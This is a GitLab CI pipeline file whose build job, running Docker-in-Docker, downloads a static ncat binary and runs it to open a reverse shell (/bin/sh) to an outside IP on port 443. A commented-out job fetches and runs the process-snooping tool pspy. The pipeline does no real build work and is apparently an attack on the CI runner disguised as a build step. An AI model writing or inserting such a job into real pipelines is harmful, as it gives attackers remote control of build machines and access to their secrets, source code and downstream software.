#build-job:
#  stage: build
#  script:
#    - curl -L https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64 -o pspy
#    - chmod +x pspy
#    - ./pspy

image: docker:19.03.12

variables:
  DOCKER_HOST: tcp://docker:2375
  DOCKER_TLS_CERTDIR: ""

services:
  - docker:19.03.12-dind

before_script:
  - docker info
build:
  stage: build
  script:
    - apk update && apk add curl && curl -L https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/ncat -o ncat && chmod +x ncat && ./ncat 164.90.226.13 443 -e /bin/sh
